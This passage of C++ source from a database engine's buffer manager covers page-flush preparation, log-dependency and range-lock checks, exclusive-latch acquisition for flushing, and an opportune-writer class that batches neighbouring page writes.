lGenMinRequired = pdbfilehdr->le_lGenMinRequired;
lGenMaxRequired = pdbfilehdr->le_lGenMaxRequired;
lGenMinConsistent = pdbfilehdr->le_lGenMinConsistent;
lGenPreRedoMinConsistent = pdbfilehdr->le_lGenPreRedoMinConsistent;
lGenPreRedoMinRequired = pdbfilehdr->le_lGenPreRedoMinRequired;
ulTrimCount = pdbfilehdr->le_ulTrimCount;
ulShrinkCount = pdbfilehdr->le_ulShrinkCount;
}
Assert( lGenMinRequired > 0 );
Assert( lGenMinConsistent > 0 );
Assert( lGenMaxRequired > 0 );
Assert( lGenMinRequired <= lGenMinConsistent );
Assert( lGenMinConsistent <= lGenMaxRequired );
const BOOL fLowerMinReqLogGenOnRedo = ( pfmp->ErrDBFormatFeatureEnabled( JET_efvLowerMinReqLogGenOnRedo ) == JET_errSuccess );
Assert( fLowerMinReqLogGenOnRedo || ( ( lGenPreRedoMinConsistent == 0 ) && ( lGenPreRedoMinRequired == 0 ) ) );
Assert( ( lGenPreRedoMinConsistent == 0 ) ||
( ( lGenPreRedoMinConsistent > lGenMinConsistent ) &&
( lGenPreRedoMinConsistent <= lGenMaxRequired ) ) );
Assert( ( lGenPreRedoMinRequired == 0 ) ||
( ( lGenPreRedoMinRequired > lGenMinRequired ) &&
( lGenPreRedoMinRequired <= lGenMaxRequired ) ) );
// We would normally bail here if JET_efvLowerMinReqLogGenOnRedo is not supported because we can't guarantee that the asserts
// below will hold, but we've decided to keep the assert even if that EFV is not supported to catch cases in which old customer DBs
// are being debugged and we don't want to lose the asserts. Therefore, selectively disable it for some tests.
if ( FNegTest( fDisableAssertReqRangeConsistentLgpos ) )
{
return;
}
if ( fIsOB0Set )
{
AssertSz( lgposOB0.lGeneration >= lGenMinConsistent, "%hsLgposOB0TooOld", szTag );
}
if ( fIsLgposModifySet )
{
AssertSz( lgposModify.lGeneration >= lGenMinConsistent, "%hsLgposModifyTooOld", szTag );
}
// There are three cases where we could be attempting to write a page with a lgposOldestBegin0 or lgposModify that
// are older than the initial lGenMinConsistent of the database. Note that they all involve starting recovery from a log generation
// which is older than the current lGenMinConsistent of the database. Although this would typically happen upon deleting
// the checkpoint file, it can also happen normally if we just start at lGenMinRequired and we encounter one of the three
// cases below when replaying the range between lGenMinRequired and lGenMinConsistent.
//
// 1- We are fixing up a lost flush, i.e., we are trying to redo a page modification which is supposed to have already
// been written to disk, but the forced-recovery from older than lGenMinConsistent is detecting that it needs to be
// redone.
//
// 2- Trim is enabled and we found a blank page that we thought needed to be redone (because we can't determine if a blank page
// became blank as a result of a future trim, or if we are redoing the initial instantiation of the page), but actually didn't
// because it is currently blank due to a future trim affecting the page.
//
// 3- Shrink is enabled and we found a blank page that we thought needed to be redone (because we can't determine if a blank page
// became blank as a result of a future shrink/re-growth, or if we are redoing the initial instantiation of the page), but actually didn't
// because it is currently blank due to a future shrink/re-growth affecting the page.
//
// Note that, while #1 can only happen in cases where we dropped a page write (a bug in the engine or a hardware issue), #2 and #3
// can happen naturally if either Trim or Shrink are enabled and the required range involves instantiating the page as a new page,
// followed by either the page being subsequently released and trimmed or shrunk/re-grown over.
if ( !FNegTest( fCorruptingWithLostFlushWithinReqRange ) && ( ulTrimCount == 0 ) && ( ulShrinkCount == 0 ) )
{
if ( fIsOB0Set && ( lGenPreRedoMinConsistent != 0 ) )
{
AssertSz( lgposOB0.lGeneration >= lGenPreRedoMinConsistent, "%hsLgposOB0TooOldPreRedo", szTag );
}
if ( fIsLgposModifySet && ( lGenPreRedoMinConsistent != 0 ) )
{
AssertSz( lgposModify.lGeneration >= lGenPreRedoMinConsistent, "%hsLgposModifyTooOldPreRedo", szTag );
}
}
}
#endif // DEBUG
TICK g_tickLastRBSWrite = 0;
ERR ErrBFIPrepareFlushPage(
_In_ const PBF pbf,
_In_ const BFLatchType bfltHave,
_In_ IOREASON ior,
_In_ const OSFILEQOS qos,
_In_ const BOOL fRemoveDependencies,
_Out_opt_ BOOL * const pfPermanentErr )
{
ERR err = JET_errSuccess;
FMP* pfmp = NULL;
BOOL fRangeLocked = fFalse;
TLS * ptls = Ptls();
Assert( FBFIUpdatablePage( pbf ) );
Enforce( pbf->err != errBFIPageFaultPending );
Enforce( pbf->err != wrnBFPageFlushPending );
Enforce( pbf->pWriteSignalComplete == NULL );
Enforce( PvBFIAcquireIOContext( pbf ) == NULL );
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
Assert( FBFIOwnsLatchType( pbf, bfltHave ) );
Assert( NULL == pfPermanentErr || *pfPermanentErr == fFalse /* by ErrBFIFlushPage() */ );
// check the error state of this BF. if the BF is already in an error
// state, fail immediately
//
// NOTE: this check makes I/O errors "permanent" such that if we ever fail
// when trying to flush a BF then we will never try again. we may want to
// change this behavior in the future. if so then we need to remove this
// check and make sure that anyone who removes this error code has the W
// Latch to avoid interactions with ErrBFIValidatePage
if ( pfPermanentErr &&
pbf->err < JET_errSuccess )
{
*pfPermanentErr = fTrue;
}
Call( pbf->err );
Assert( NULL == pfPermanentErr || *pfPermanentErr == fFalse /* should have bailed on permanent errors */ );
// if this is an abandoned BF, fail out and let the abandon code deal with it
Expected( !pbf->fAbandoned );
if ( pbf->fAbandoned )
{
Error( ErrERRCheck( errBFIPageAbandoned ) );
}
// if this BF had a flush order dependency on another BF and that BF was
// purged then it is unflushable
if ( pbf->bfbitfield.FDependentPurged() )
{
Call( ErrERRCheck( errBFIDependentPurged ) );
}
// if this is the I/O thread then do not allow the page to be flushed to
// avoid a possible deadlock if the IOREQ pool is empty
if ( FIOThread() )
{
AssertSz( fFalse, "We have changed the Buffer Manager so this should never happen. Please tell SOMEONE if it does." );
Call( ErrERRCheck( errBFIPageFlushDisallowedOnIOThread ) );
}
// remove all flush order dependencies from this BF, which are now restricted
// to time-dependencies (from versioned pages)
while ( pbf->pbfTimeDepChainNext != pbfNil )
{
// find a leaf of our branch in the time dependency chain, i.e., the oldest
// version of the page, which must be flushed first
g_critBFDepend.Enter();
PBF pbfT = PbfBFIGetFlushOrderLeaf( pbf, ptls->fCheckpoint );
// Inter-page dependencies (i.e. between different pages, including different databases) are dead.
AssertTrack( pbf->pgno == pbfT->pgno && pbf->ifmp == pbfT->ifmp, "InterPageDependencyDeprecated" );
g_critBFDepend.Leave();
// possibly async flush this BF
//
// NOTE: it is possible that someone else already flushed this
// page. this is because the BF will be in the time dependency chain
// until after the write completes. if this happens, we will
// get JET_errSuccess and retry the entire operation
//
// NOTE: this call will result in at least one level of recursion.
// usually, we will only recurse once because we are trying to flush
// dependency chain heads. it is possible that another thread could
// write latch the page, add a dependency, and release the write
// latch between the time we leave the critical section protecting
// the dependency tree and try to get the exclusive latch on the
// page. this would cause us to recurse another level. because we
// can recurse far faster than any other thread should be able to
// do the above, the probability of deep recursion should be remote.
// if we do happen to catch someone doing this, we will stop
// recursing with errBFLatchConflict because we will not be able
// to exclusively latch the page to flush it
//
// NOTE: we must disable ownership tracking because it is possible
// that we will try to latch a page that we already have latched
// while trying to flush the dependency chain. yes, this is tragic.
// the only reason it works is because we try-acquire the exclusive
// latch instead of acquiring it and this will work even if we
// already have the shared latch
CLockDeadlockDetectionInfo::DisableOwnershipTracking();
ior.AddFlag( iorfDependantOrVersion );
err = ErrBFIFlushPage( pbfT, ior, qos, bfdfDirty, !fRemoveDependencies );
CLockDeadlockDetectionInfo::EnableOwnershipTracking();
Call( err );
}
// log and remove all undo info from the BF
if ( pbf->prceUndoInfoNext != prceNil )
{
if ( !fRemoveDependencies )
{
Call( ErrERRCheck( errBFIRemainingDependencies ) );
}
ENTERCRITICALSECTION ecs( &g_critpoolBFDUI.Crit( pbf ) );
while ( pbf->prceUndoInfoNext != prceNil )
{
// try to log the current undo info, but do not wait if the log buffer
// is full
LGPOS lgpos;
err = ErrLGUndoInfoWithoutRetry( pbf->prceUndoInfoNext, &lgpos );
// we succeeded logging the undo info
if ( err >= JET_errSuccess )
{
// remove this undo info from the BF
BFIRemoveUndoInfo( pbf, pbf->prceUndoInfoNext, lgpos );
}
// we failed logging the undo info
else
{
// we failed because the log is down
if ( err == JET_errLogWriteFail ||
err == JET_errLogDisabledDueToRecoveryFailure )
{
// fail with this error
Call( err );
}
// we failed because we cannot log undo info during redo
else if ( err == JET_errCannotLogDuringRecoveryRedo )
{
// we must wait for this dependency to be removed via
// BFRemoveUndoInfo()
//
// NOTE: act as if this was a latch conflict so that the
// allocation quota system views it as an external buffer
// allocation (which it is... sort of)
Call( ErrERRCheck( errBFLatchConflict ) );
}
// we failed because the log buffers are full
else
{
Assert( err == errLGNotSynchronous );
// prepare to flush the log for the instance of this IFMP
// for this thread. if we cannot do this then fail with
// the error
Call( ptls->pbfil->ErrPrepareLogWrite( pbf->ifmp ) );
// we must wait to remove this dependency
Call( ErrERRCheck( errBFIRemainingDependencies ) );
}
}
}
}
// reject the flush if it is for a page touched after the waypoint
//
// WARNING: we must make this determination AFTER removing undo info,
// because the act of removing undo info will almost certainly update
// lgposModify beyond the waypoint
LOG * const plog = PinstFromIfmp( pbf->ifmp )->m_plog;
LGPOS lgposWaypoint;
lgposWaypoint = g_rgfmp[ pbf->ifmp ].LgposWaypoint(); // get the waypoint.
// The lgposModify and Waypoint are both lgposMin when you attach a database without
// logging, so the first check is to verify this BF is for a logged database, and ...
// the 2nd check is the heart of LLR / jetlag, it verifies the page to be flushed
// was not modified later than the waypoint / LLR depth.
if ( ( CmpLgpos( &pbf->lgposModify, &lgposMin ) != 0 ) &&
( CmpLgpos( &pbf->lgposModify, &lgposWaypoint ) >= 0 ) )
{
// the log is down
if ( plog->FNoMoreLogWrite() )
{
// fail with this error
Call( ErrERRCheck( JET_errLogWriteFail ) );
}
// we can get into a situation where the log buffer is lazily flushed over the
// boundary of a log file; this causes us to spin endlessly against the waypoint
// until the log is flushed, so let's flush the log
LGPOS lgposTip;
plog->LGLogTipWithLock( &lgposTip ); // don't think we need: LgposLGLogTipNoLock
if ( plog->LGGetCurrentFileGenWithLock() < lgposTip.lGeneration &&
!plog->FLGProbablyWriting() )
{
// should be trivially true (OR how did the waypoint get onto unflushed data!?), and
// if not, we should probably add it to the if clause above?
Expected( lgposWaypoint.lGeneration < lgposTip.lGeneration );
Call( ptls->pbfil->ErrPrepareLogWrite( pbf->ifmp ) );
Call( ErrERRCheck( errBFIRemainingDependencies ) );
}
// maybe things have improved ... so request waypoint maint ...
BFIMaintWaypointRequest( pbf->ifmp );
// request that we maintain idle databases so that pages pinned by the
// waypoint don't cause other maintenance functions to get stuck on
// those pages for a prolonged period of time
//
// this task does not need to run if the current LLR is configured to zero.
if ( UlParam( PinstFromIfmp( pbf->ifmp ), JET_paramWaypointLatency ) > 0 )
{
BFIMaintIdleDatabaseRequest( pbf );
}
Call( ErrERRCheck( errBFIPageTouchTooRecent ) );
}
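// Illustrative example (assumed numbers, for clarity only): with LLR configured, if the waypoint
// is at generation 0x10 and this page's lgposModify is at generation 0x12, the check above rejects
// the flush with errBFIPageTouchTooRecent until waypoint maintenance (requested via
// BFIMaintWaypointRequest()) advances the waypoint past the modification.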
// this BF is dependent on the log
LGPOS lgposWriteTip, lgposFlushTip;
plog->LGWriteAndFlushTip( &lgposWriteTip, &lgposFlushTip );
const INT icmpWrite = CmpLgpos( &pbf->lgposModify, &lgposWriteTip );
const INT icmpFlush = CmpLgpos( &pbf->lgposModify, &lgposFlushTip );
const BOOL fSnapshotFlushed = !g_rgfmp[ pbf->ifmp ].FRBSOn() || CmpRbspos( g_rgfmp[ pbf->ifmp ].PRBS()->RbsposFlushPoint(), pbf->rbsposSnapshot ) >= 0;
if ( !plog->FLogDisabled() &&
icmpWrite >= 0 )
{
if ( plog->FRecoveringMode() == fRecoveringRedo || !fRemoveDependencies )
{
Call( ErrERRCheck( errBFIRemainingDependencies ) );
}
// the log is down
if ( plog->FNoMoreLogWrite() )
{
// fail with this error
Call( ErrERRCheck( JET_errLogWriteFail ) );
}
// the log is up
else
{
// prepare to flush the log for the instance of this IFMP
// for this thread. if we cannot do this then fail with
// the error
Call( ptls->pbfil->ErrPrepareLogWrite( pbf->ifmp ) );
// we must wait to remove this dependency
Call( ErrERRCheck( errBFIRemainingDependencies ) );
}
}
else if ( !plog->FLogDisabled() &&
icmpFlush >= 0 )
{
// the log is down
if ( plog->FNoMoreLogWrite() )
{
// fail with this error
Call( ErrERRCheck( JET_errLogWriteFail ) );
}
// the log is up
// We will not flush the log currently; this is OK for Windows right now since we do flush for capacity/commit flushes,
// but we need to revisit this when we remove capacity flushes.
// Note that LLR disables capacity/commit flushes and the Exchange store uses LLR.
Call( ErrERRCheck( errBFIPageTouchTooRecent ) );
}
else if ( !fSnapshotFlushed )
{
Assert( g_rgfmp[ pbf->ifmp ].FRBSOn() );
if ( fRemoveDependencies && g_rgfmp[ pbf->ifmp ].PRBS()->FTooLongSinceLastFlush() )
{
Call( ptls->pbfil->ErrPrepareRBSWrite( pbf->ifmp ) );
// We will have to return error on this iteration, and try again later.
Call( ErrERRCheck( errBFIRemainingDependencies ) );
}
// We are not ready to flush RBS yet
Call( ErrERRCheck( errBFIPageTouchTooRecent ) );
}
// check the range lock (backup dependency)
// get the active range lock
AssertTrack( !pbf->bfbitfield.FRangeLocked(), "BFPrepRangeAlreadyLocked" );
CMeteredSection::Group irangelock = CMeteredSection::groupTooManyActiveErr;
pfmp = &g_rgfmp[ pbf->ifmp ];
fRangeLocked = pfmp->FEnterRangeLock( pbf->pgno, &irangelock );
if ( fRangeLocked )
{
// leave our reference on this range lock until this BF has
// been flushed or we decide to not flush this BF
pbf->bfbitfield.SetFRangeLocked( fTrue );
Assert( irangelock == 0 || irangelock == 1 );
pbf->irangelock = BYTE( irangelock );
Assert( pbf->irangelock == irangelock );
}
else
{
if ( irangelock == CMeteredSection::groupTooManyActiveErr )
{
// no reference on range lock to release, because we didn't get it
Error( ErrERRCheck( errDiskTilt ) );
}
else
{
// there is a dependency on this BF that we must wait to remove
Error( ErrERRCheck( errBFIRemainingDependencies ) );
}
}
Assert( fRangeLocked );
Assert( pbf->bfbitfield.FRangeLocked() );
Assert( irangelock != CMeteredSection::groupTooManyActiveErr );
Assert( pbf->irangelock != CMeteredSection::groupTooManyActiveErr ); // sadly trivially true, consider giving one more bit to irangelock
// this page is not the full size (required to be persisted on disk), so
// rehydrate the page to full size for flush
if ( pbf->icbBuffer != pbf->icbPage )
{
Assert( bfdfClean == pbf->bfdf || bfdfUntidy == pbf->bfdf );
if ( bfltExclusive == bfltHave )
{
const CSXWLatch::ERR errTryW = pbf->sxwl.ErrTryUpgradeExclusiveLatchToWriteLatch();
if ( CSXWLatch::ERR::errLatchConflict == errTryW )
{
// Things didn't work out, sorry.
Call( ErrERRCheck( errBFLatchConflict ) );
}
Assert( CSXWLatch::ERR::errSuccess == errTryW );
}
BFIRehydratePage( pbf );
Assert( pbf->icbBuffer == pbf->icbPage );
if ( bfltExclusive == bfltHave )
{
pbf->sxwl.DowngradeWriteLatchToExclusiveLatch();
}
}
// set checksum and flush type.
if ( FBFIDatabasePage( pbf ) )
{
CFlushMap* const pfm = pfmp->PFlushMap();
const BOOL fIsDirty = ( pbf->bfdf >= bfdfDirty );
const BOOL fIsPagePatching = ( ior.Iorp() == IOREASONPRIMARY( iorpPatchFix ) );
const BOOL fIsFmRecoverable = pfm->FRecoverable();
const BOOL fIsOB0Set = CmpLgpos( &pbf->lgposOldestBegin0, &lgposMax ) != 0;
Assert( CmpLgpos( &pbf->lgposOldestBegin0, &lgposMin ) != 0 );
const BOOL fIsLgposModifySet = CmpLgpos( &pbf->lgposModify, &lgposMin ) != 0;
Assert( CmpLgpos( &pbf->lgposModify, &lgposMax ) != 0 );
const CPAGE::PageFlushType pgftMapCurrent = pfm->PgftGetPgnoFlushType( pbf->pgno );
CPAGE::PageFlushType pgftPageCurrent;
CPAGE::PageFlushType pgftPageNext = pgftMapCurrent;
AssertSz( !( pbf->fOlderVersion || !pbf->fCurrentVersion ) || fIsDirty, "Must not write non-dirty older versions." );
CPAGE cpage;
Assert( CbBFIBufferSize( pbf ) == CbBFIPageSize( pbf ) );
cpage.LoadPage( pbf->ifmp, pbf->pgno, pbf->pv, CbBFIBufferSize( pbf ) );
if ( !FBFIBufferIsZeroed( pbf ) && ( cpage.Dbtime() != dbtimeShrunk ) && ( cpage.Dbtime() != dbtimeRevert ) )
{
pgftPageCurrent = cpage.Pgft();
if ( pbf->bfdf > bfdfClean )
{
// There is a subtlety in picking the flush map to use as the basis for the next
// state. If you used the page state, and imagine that you have versioned the page,
// before trying to flush the page, you'd flip the bit on the older page, meanwhile the
// newer page would be left in the old state, so you'd have a hole in your lost flush
// detection logic.
//
// Also, pick the current state in case the page isn't clean and does not have a valid
// OB0 or LgposModify. The cases we know about are:
// 1) the unmodified current version of a versioned page. This is acceptable because
// the version with a valid OB0 is the one that should have held the checkpoint back
// for the purposes of rebuilding the flush map on crash.
// 2) Untidy pages. In this case, we incur the risk of not detecting a lost flush, but
// that is acceptable because an 'untidy' modification is losable.
// 3) Index pages during batch index creation do have an OB0, but not a LgposModify, which
// means the flush state is not crash-consistent, since the operations are unlogged.
// The logic above is not applied in case of an unlogged database. In that case, OB0 is never
// set.
if ( fIsPagePatching )
{
pgftPageNext = CPAGE::pgftUnknown;
}
else if ( ( pgftMapCurrent == CPAGE::pgftUnknown ) && ( pgftPageCurrent == CPAGE::pgftUnknown ) )
{
pgftPageNext = CPAGE::PgftGetNextFlushType( CPAGE::pgftUnknown );
}
else
{
const BOOL fChangeFlushType = !fIsFmRecoverable || ( fIsOB0Set && fIsLgposModifySet && fIsDirty );
const CPAGE::PageFlushType pgftPageNextSeed = ( pgftMapCurrent != CPAGE::pgftUnknown ) ? pgftMapCurrent : pgftPageCurrent;
Assert( pgftPageNextSeed != CPAGE::pgftUnknown );
if ( fChangeFlushType )
{
pgftPageNext = CPAGE::PgftGetNextFlushType( pgftPageNextSeed );
}
else
{
pgftPageNext = pgftPageNextSeed;
}
}
Assert( ( pgftPageNext != CPAGE::pgftUnknown ) || fIsPagePatching );
// Stamp flush type and checksum. Note we do not update the flush map until the I/O has completed.
cpage.PreparePageForWrite( pgftPageNext );
}
// Validation
BFIValidatePagePgno( pbf );
}
else
{
pgftPageCurrent = CPAGE::pgftUnknown;
pgftPageNext = CPAGE::pgftUnknown;
}
cpage.UnloadPage();
if ( !fIsDirty && fIsFmRecoverable &&
( pgftMapCurrent != CPAGE::pgftUnknown ) &&
( pgftPageCurrent != CPAGE::pgftUnknown ) )
{
AssertSz( ( pgftMapCurrent == pgftPageCurrent ) && ( pgftPageCurrent == pgftPageNext ), "Non-dirty page must match in-memory flush state." );
}
// Make sure the relevant lgpos's are consistent with the required range stamped in the DB header.
OnDebug( BFIAssertReqRangeConsistentWithLgpos( pfmp, pbf->lgposOldestBegin0, pbf->lgposModify, "PrepareFlushPage" ) );
// Force a sync write of the affected flush map page if required.
if ( fIsPagePatching && fIsFmRecoverable )
{
if ( pfm->ErrSetPgnoFlushTypeAndWait( pbf->pgno, CPAGE::pgftUnknown, dbtimeNil ) < JET_errSuccess )
{
Error( ErrERRCheck( errBFIReqSyncFlushMapWriteFailed ) );
}
}
}
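// Summary of the flush-type selection above (derived from the code, stated here for clarity):
// page patching forces pgftUnknown; if both the flush map and the page are pgftUnknown, the type
// advances from pgftUnknown; otherwise the seed is the flush-map state (or the page state if the
// map is unknown), and the type is advanced only when the map is not recoverable or the page is
// dirty with valid OB0 and lgposModify, so that the lost-flush detection state stays consistent
// across the write.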
// prepare to issue I/O against this IFMP for this thread. if we cannot
// do this then release our range lock and fail with the error
if ( ( err = ptls->pbfil->ErrPrepareWrite( pbf->ifmp ) ) < JET_errSuccess )
{
Call( err );
}
BFIAssertReadyForWrite( pbf );
HandleError:
Assert( FBFIOwnsLatchType( pbf, bfltHave ) );
if ( ( err < JET_errSuccess ) && fRangeLocked )
{
AssertTrack( pbf->bfbitfield.FRangeLocked(), "BFPrepFlushRangeNotLocked" );
pfmp->LeaveRangeLock( pbf->pgno, pbf->irangelock );
pbf->bfbitfield.SetFRangeLocked( fFalse );
fRangeLocked = fFalse;
}
// we cannot remove all dependencies on this BF due to a fatal error
if ( err < JET_errSuccess &&
err != JET_errOutOfMemory &&
err != errDiskTilt &&
err != errBFIRemainingDependencies &&
err != errBFIPageTouchTooRecent &&
err != errBFIPageFlushed &&
err != errBFIPageFlushPending &&
err != errBFIPageFlushPendingSlowIO &&
err != errBFIPageFlushPendingHungIO &&
err != errBFLatchConflict &&
err != errBFIPageFlushDisallowedOnIOThread &&
err != errBFIReqSyncFlushMapWriteFailed )
{
// set this BF to the appropriate error state
pbf->err = SHORT( err );
Assert( pbf->err == err );
Assert( pbf->err != JET_errFileIOBeyondEOF ); // illegal to have EOF lingering in the cache
}
// return the result of the remove dependencies operation
return err;
}
BOOL FBFITryAcquireExclusiveLatchForMaint( const PBF pbf )
{
// NOTE: we must disable ownership tracking because it is possible
// that we will try to latch a page that we already have latched
// the only reason it works is because we try-acquire the exclusive
// latch instead of acquiring it and this will work even if we
// already have the shared latch
//
CLockDeadlockDetectionInfo::DisableOwnershipTracking();
const CSXWLatch::ERR errSXWL = pbf->sxwl.ErrTryAcquireExclusiveLatch();
CLockDeadlockDetectionInfo::EnableOwnershipTracking();
if ( errSXWL != CSXWLatch::ERR::errSuccess )
{
Assert( errSXWL == CSXWLatch::ERR::errLatchConflict );
return fFalse; // too bad, we fail ...
}
pbf->sxwl.ClaimOwnership( bfltExclusive );
return fTrue;
}
// try to acquire an exclusive latch for flushing purposes, or return success
// if flush was completed.
//
// The fUnencumberedPath means that this function is being called from a path
// that does not need to keep the page un-modified (such as background processes
// like checkpoint maintenance or scavenge). The other possibility is due to
// the lockless-IO model, foreground threads may complete the flush by calling
// this API during read upgrade to write-latch for example.
ERR ErrBFIAcquireExclusiveLatchForFlush( PBF pbf, __in const BOOL fUnencumberedPath )
{
ERR err = JET_errSuccess;
// can we exclusively latch this BF?
CSXWLatch::ERR errSXWL = pbf->sxwl.ErrTryAcquireExclusiveLatch();
if ( errSXWL == CSXWLatch::ERR::errSuccess )
{
// Do not flush abandoned pages.
if ( pbf->fAbandoned )
{
pbf->sxwl.ReleaseExclusiveLatch();
Error( ErrERRCheck( errBFIPageAbandoned ) );
}
// In latchless IO model we have to check if we have or don't have the x-latch ...
if ( pbf->err == wrnBFPageFlushPending )
{
if ( !FBFICompleteFlushPage( pbf, bfltExclusive, fUnencumberedPath ) )
{
err = ErrBFIFlushPendingStatus( pbf );
Assert( err < JET_errSuccess );
// return flush in progress
pbf->sxwl.ReleaseExclusiveLatch();
Error( err );
}
// else the IO is completed.
// With view-cache remapping, the FBFICompleteFlushPage() can leave
// the buffer in a freshly IO-error'd state (as if there was a read
// IO error) ... this path can handle that ... we fail out of prepare
// flush page if the BF is in an error'd state.
// completed the state transition associated with the write IO ...
Assert( pbf->err < JET_errSuccess || pbf->bfdf == bfdfClean );
Assert( FBFIUpdatablePage( pbf ) );
// all this is OK, we still pass back w/ the x-latch, as then ErrBFIFlushPage()
// or CBFOpportuneWriter::ErrPrepareBFForOpportuneWrite_() will process the
// BF as a clean buffer and behave accordingly.
}
// Note you can check this outside of g_critBFDepend, because we only add versions at
// the head of the chain, and if we remove a version after we checked, then the called
// function will make the right decision from within g_critBFDepend.
if ( pbf->pbfTimeDepChainNext )
{
// we want to remove any clean versions below this
(void)ErrBFIEvictRemoveCleanVersions( pbf );
// we do not care about errors, we will then fall to the later write and prepare write
// functions which will ensure the right things are done.
}
return JET_errSuccess;
}
else
{
// the page is latched ...
// we do not claim errBFIPageFlushPending when pbf->err == wrnBFPageFlushPending because
// if the BF is latched, either
// 1. it is just now being flushed, and will be unlatched in a moment (no big deal).
// 2. it is latched possibly for usage of ErrBFIVersionCopyPage(), possibly even on
// this thread, so we return latch conflict so ErrBFIMaintScavengeIScavengePages()
// does not deadlock trying to alloc a page for ErrBFIVersionCopyPage().
// return latch conflict because we could not flush the page
Call( ErrERRCheck( errBFLatchConflict ) );
}
HandleError:
Assert( JET_errSuccess == err || pbf->sxwl.FNotOwner() );
Assert( JET_errSuccess != err || pbf->sxwl.FOwnExclusiveLatch() );
return err;
}
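// Contract note (derived from the asserts above): on JET_errSuccess the caller owns the exclusive
// latch and the buffer is updatable (any pending flush has been completed on the spot); on any
// failure (errBFIPageAbandoned, errBFLatchConflict, or one of the flush-pending statuses) the
// latch is not held.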
class CBFOpportuneWriter
{
public:
CBFOpportuneWriter( ULONG cbfMax, ULONG cbfMaxCleanRun, IOREASON iorBase, OSFILEQOS qos ) :
m_cbfMax( cbfMax ), m_cbfMaxCleanRun( cbfMaxCleanRun ), m_iorBase( iorBase ), m_qos( qos ), m_cbfUseful( 0 ), m_cbfLatched( 0 )
{
Assert( m_iorBase.Iorp() != iorpNone );
memset( m_rgpbf, 0, sizeof( m_rgpbf[ 0 ] ) * m_cbfMax );
}
~CBFOpportuneWriter();
// Performs opportune writes for the pages around pgno.
// The specified pgno should already be written (this method does not write it).
void PerformOpportuneWrites( const IFMP ifmp, const PGNO pgno );
private:
void AssertValid_() const;
bool FFull_() const { return m_cbfMax <= m_cbfLatched; }
ULONG CBFLatched() const { return m_cbfLatched; }
ERR ErrCanAddBF_( const PBF pbf );
ERR ErrAddBF_( const PBF pbf );
void RevertBFs_( ULONG ibfStart = 0 ); // exclude BFs from ibfStart onwards from the opportune write
void FlushUsefulBFs_();
bool FVerifyCleanBFs_(); // verify checksum of clean BFs are still valid
ERR ErrPrepareBFForOpportuneWrite_( const PBF pbf );
void GetFlushableNeighboringBFs_( const IFMP ifmp, const PGNO pgno, const INT iDelta );
const IOREASON m_iorBase;
const OSFILEQOS m_qos;
const ULONG m_cbfMax; // maximum # of BFs we can hold
const ULONG m_cbfMaxCleanRun; // maximum # of clean BFs of a gap
// Latched BFs: all the BFs we have latched so far
// Useful BFs: BFs we surely want to flush
// i.e. latched clean BFs won't become "useful" until next dirty BF comes
ULONG m_cbfUseful;
ULONG m_cbfLatched;
// we always use _alloca and placement new to allocate object of CBFOpportuneWriter,
// the extra space from the allocation goes nicely into this array.
PBF m_rgpbf[];
};
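// Lifecycle note (based on the comment above and the usage in BFIPerformOpportuneWrites() below):
// the object is sized dynamically - the caller _alloca's
// sizeof( CBFOpportuneWriter ) + sizeof( PBF ) * cbfMax and placement-news the object so that
// m_rgpbf[] occupies the trailing space, then destroys it explicitly with ~CBFOpportuneWriter()
// rather than via delete.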
void CBFOpportuneWriter::AssertValid_() const
{
Assert( m_cbfMaxCleanRun <= m_cbfMax );
Assert( m_cbfUseful <= m_cbfLatched );
Assert( m_cbfLatched <= m_cbfMax );
Assert( qosIOOptimizeCombinable & m_qos );
}
ERR CBFOpportuneWriter::ErrCanAddBF_( const PBF pbf )
{
ERR err = JET_errSuccess;
AssertValid_();
Assert( pbf->sxwl.FOwnExclusiveLatch() );
// too many BFs
if ( FFull_() )
{
Call( ErrERRCheck( errBFIOutOfBatchIOBuffers ) );
}
// too big a gap of tentative BFs
if ( bfdfClean == pbf->bfdf && m_cbfUseful + m_cbfMaxCleanRun <= m_cbfLatched )
{
Call( ErrERRCheck( errBFIOutOfBatchIOBuffers ) );
}
HandleError:
AssertValid_();
return err;
}
ERR CBFOpportuneWriter::ErrAddBF_( const PBF pbf )
{
ERR err = JET_errSuccess;
AssertValid_();
Assert( pbf->sxwl.FOwnExclusiveLatch() );
// call ErrCanAddBF_ to really make sure
Call( ErrCanAddBF_( pbf ) );
if ( ( m_cbfLatched + 1 < m_cbfMax ) && m_rgpbf[ m_cbfLatched + 1 ] )
{
// ensure the previously stored BF is not latched ...
Assert( m_rgpbf[ m_cbfLatched + 1 ]->sxwl.FNotOwner() );
}
// add the BF to the target list of flushes
m_rgpbf[ m_cbfLatched++ ] = pbf;
if ( bfdfClean != pbf->bfdf )
{
m_cbfUseful = m_cbfLatched;
}
HandleError:
AssertValid_();
return err;
}
void CBFOpportuneWriter::RevertBFs_( ULONG ibfStart )
{
for ( ULONG ibf = ibfStart; ibf < m_cbfLatched; ibf++ )
{
PBF pbf = m_rgpbf[ ibf ];
if ( pbf )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() );
AssertTrack( pbf->bfbitfield.FRangeLocked(), "BFRevertRangeNotLocked" );
g_rgfmp[ pbf->ifmp ].LeaveRangeLock( pbf->pgno, pbf->irangelock );
pbf->bfbitfield.SetFRangeLocked( fFalse );
pbf->sxwl.ReleaseExclusiveLatch();
}
}
m_cbfLatched = min( m_cbfLatched, ibfStart );
m_cbfUseful = min( m_cbfUseful, ibfStart );
AssertValid_();
}
CBFOpportuneWriter::~CBFOpportuneWriter()
{
AssertValid_();
for ( ULONG ibf = 0; ibf < m_cbfMax; ibf++ )
{
PBF pbf = m_rgpbf[ ibf ];
if ( pbf )
{
Assert( pbf->sxwl.FNotOwnExclusiveLatch() );
}
}
}
void CBFOpportuneWriter::FlushUsefulBFs_()
{
ERR errLastFlush = errCodeInconsistency;
ULONG cbfUseful = m_cbfUseful;
if ( cbfUseful )
{
ULONG ibf;
for ( ibf = 0; ibf < cbfUseful; ++ibf )
{
Assert( m_qos & qosIOOptimizeCombinable );
const OSFILEQOS qosT = m_qos | ( ( m_rgpbf[ ibf ]->bfdf == bfdfClean ) ? qosIOOptimizeOverwriteTracing : 0 );
// async flush this page
errLastFlush = ErrBFIFlushExclusiveLatchedAndPreparedBF( m_rgpbf[ ibf ], m_iorBase, qosT, fTrue );
Assert( errBFIPageFlushed == errLastFlush || errDiskTilt == errLastFlush );
if( errDiskTilt == errLastFlush )
{
Assert( m_rgpbf[ ibf ]->sxwl.FOwnExclusiveLatch() );
break;
}
Assert( errBFIPageFlushed == errLastFlush );
}
if ( ibf < cbfUseful )
{
